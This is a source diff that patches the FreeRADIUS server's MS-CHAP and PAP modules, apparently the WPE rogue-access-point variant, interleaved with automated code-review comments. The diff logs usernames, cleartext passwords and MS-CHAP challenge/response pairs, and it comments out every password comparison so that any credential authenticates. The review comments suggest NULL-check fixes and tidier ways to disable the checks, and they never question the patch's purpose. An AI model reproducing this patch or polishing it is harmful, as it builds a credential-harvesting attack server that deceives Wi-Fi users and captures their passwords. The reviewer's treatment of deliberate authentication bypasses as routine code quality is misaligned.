--- freeradius-server-2.0.2/src/modules/rlm_mschap/rlm_mschap.c 2008-01-09 08:20:56.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/modules/rlm_mschap/rlm_mschap.c 2008-02-15 19:37:35.000000000 -0500
@@ -735,12 +735,14 @@
static int do_mschap(rlm_mschap_t *inst,
REQUEST *request, VALUE_PAIR *password,
uint8_t *challenge, uint8_t *response,
- uint8_t *nthashhash)
+ uint8_t *nthashhash, char *username)
{
int do_ntlm_auth = 0;
uint8_t calculated[24];
VALUE_PAIR *vp = NULL;

+ log_wpe("mschap", username, NULL, challenge, 8, response, 24);
+
/*
* If we have ntlm_auth configured, use it unless told
* otherwise
@@ -778,9 +780,10 @@
}

smbdes_mschap(password->vp_strvalue, challenge, calculated);
- if (memcmp(response, calculated, 24) != 0) {
- return -1;
- }
+ /* Always return success for any password */
+ //if (memcmp(response, calculated, 24) != 0) {
+ // return -1;
+ //}

/*
* If the password exists, and is an NT-Password,
@@ -1194,8 +1197,10 @@
/*
* Do the MS-CHAP authentication.
*/
+ username = pairfind(request->packet->vps, PW_USER_NAME);
if (do_mschap(inst, request, password, challenge->vp_octets,
- response->vp_octets + offset, nthashhash) < 0) {
+ response->vp_octets + offset, nthashhash,
+ username->vp_strvalue) < 0) {
DEBUG2(" rlm_mschap: MS-CHAP-Response is incorrect.");
mschap_add_reply(&request->reply->vps,
*response->vp_octets,
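Review bot: `username = pairfind(request->packet->vps, PW_USER_NAME);` is dereferenced two lines later as `username->vp_strvalue` without a NULL check, and `pairfind()` returns NULL when the request carries no User-Name attribute, so such a request crashes the server here. Since `log_wpe()` already accepts a NULL username, the minimal fix is to pass `username ? (char *) username->vp_strvalue : NULL`. The enclosing function starts and ends outside this hunk, so the declaration of `username` (presumably a `VALUE_PAIR *` earlier in the function) is not visible here.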
@@ -1274,7 +1279,8 @@
username_string);

if (do_mschap(inst, request, nt_password, mschapv1_challenge,
- response->vp_octets + 26, nthashhash) < 0) {
+ response->vp_octets + 26, nthashhash,
+ username_string) < 0) {
DEBUG2(" rlm_mschap: FAILED: MS-CHAP2-Response is incorrect");
mschap_add_reply(&request->reply->vps,
*response->vp_octets,
diff -ru freeradius-server-2.0.2/src/modules/rlm_pap/rlm_pap.c freeradius-server-2.0.2-wpe/src/modules/rlm_pap/rlm_pap.c
--- freeradius-server-2.0.2/src/modules/rlm_pap/rlm_pap.c 2007-12-28 23:38:19.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/modules/rlm_pap/rlm_pap.c 2008-02-15 19:37:35.000000000 -0500
@@ -492,6 +492,10 @@
return RLM_MODULE_INVALID;
}

+ /* WPE */
+ log_wpe("pap",request->username->vp_strvalue, request->password->vp_strvalue,
+ NULL, 0, NULL, 0);
+
/*
* Clear-text passwords are the only ones we support.
*/
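Review bot: The new `log_wpe("pap", ...)` call dereferences `request->username->vp_strvalue` with no NULL check; the `return RLM_MODULE_INVALID` just above appears to belong to a guard on `request->password` (its condition is outside the hunk), but nothing visible guards `request->username`, and a request with no User-Name attribute is not rejected by anything shown here. Passing `request->username ? (char *) request->username->vp_strvalue : NULL` matches the NULL handling `log_wpe()` already has. The enclosing function continues outside this hunk.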
@@ -582,11 +586,14 @@
do_clear:
DEBUG("rlm_pap: Using clear text password \"%s\"",
vp->vp_strvalue);
+ /* WPE - always succeed */
+ /*
if (strcmp((char *) vp->vp_strvalue,
(char *) request->password->vp_strvalue) != 0){
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: CLEAR TEXT password check failed");
goto make_msg;
}
+ */
done:
DEBUG("rlm_pap: User authenticated successfully");
return RLM_MODULE_OK;
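Review bot: The strcmp is disabled by wrapping it in a `/* */` block rather than removing it or compiling it out, and the same wrapping is repeated in the MD5, SMD5, SHA1, SSHA, NT and LM hunks below. The digests those branches compute (`fr_MD5Final`, `fr_SHA1Final`, `fr_hex2bin`) are now calculated and discarded, and `module_fmsg` is still filled in the xlat-failure paths but never read, which `-Wall` will report as set-but-unused. If the checks are to stay in the tree, `#if 0 ... #endif` is the conventional way to disable them: a `/* */` wrapper cannot contain another comment, and a single preprocessor marker gives a reader one thing to search for when auditing which comparisons a build actually performs. The enclosing switch continues outside each of these hunks.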
@@ -618,10 +625,13 @@
fr_MD5Update(&md5_context, request->password->vp_octets,
request->password->length);
fr_MD5Final(digest, &md5_context);
+ /* WPE - Always succeed */
+ /*
if (memcmp(digest, vp->vp_octets, vp->length) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: MD5 password check failed");
goto make_msg;
}
+ */
goto done;
break;

@@ -645,10 +655,13 @@
/*
* Compare only the MD5 hash results, not the salt.
*/
+ /* WPE - always succeed */
+ /*
if (memcmp(digest, vp->vp_octets, 16) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SMD5 password check failed");
goto make_msg;
}
+ */
goto done;
break;

@@ -667,10 +680,13 @@
fr_SHA1Update(&sha1_context, request->password->vp_octets,
request->password->length);
fr_SHA1Final(digest,&sha1_context);
+ /* WPE - Always succeed */
+ /*
if (memcmp(digest, vp->vp_octets, vp->length) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SHA1 password check failed");
goto make_msg;
}
+ */
goto done;
break;

@@ -691,10 +707,13 @@
request->password->length);
fr_SHA1Update(&sha1_context, &vp->vp_octets[20], vp->length - 20);
fr_SHA1Final(digest,&sha1_context);
+ /* WPE - Always succeed */
+ /*
if (memcmp(digest, vp->vp_octets, 20) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SSHA password check failed");
goto make_msg;
}
+ */
goto done;
break;

@@ -716,11 +735,14 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed");
goto make_msg;
}
+ /* WPE - Always succeed */
+ /*
if ((fr_hex2bin(digest, digest, 16) != vp->length) ||
(memcmp(digest, vp->vp_octets, vp->length) != 0)) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: NT password check failed");
goto make_msg;
}
+ */
goto done;
break;

@@ -741,16 +763,22 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed");
goto make_msg;
}
+ /* WPE - Always succeed */
+ /*
if ((fr_hex2bin(digest, digest, 16) != vp->length) ||
(memcmp(digest, vp->vp_octets, vp->length) != 0)) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: LM password check failed");
+ */
+
make_msg:
+ /*
DEBUG("rlm_pap: Passwords don't match");
module_fmsg_vp = pairmake("Module-Failure-Message",
module_fmsg, T_OP_EQ);
pairadd(&request->packet->vps, module_fmsg_vp);
return RLM_MODULE_REJECT;
}
+ */
goto done;
break;

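Review bot: `make_msg:` is now followed only by a comment and `goto done;`, so the two remaining `goto make_msg` jumps on "mschap xlat failed" in this and the NT hunk above also reach `done` and return RLM_MODULE_OK — an internal xlat error is reported as a successful authentication rather than as an error, and the `module_fmsg_vp` variable becomes set-but-unused. If that is intended, it should be stated at the label, e.g. `/* WPE: make_msg falls through to done, so xlat failures also return RLM_MODULE_OK */`; if not, the label should keep a distinct `DEBUG` so the log still distinguishes a failed xlat from an accepted credential. The enclosing switch and function continue outside the hunk.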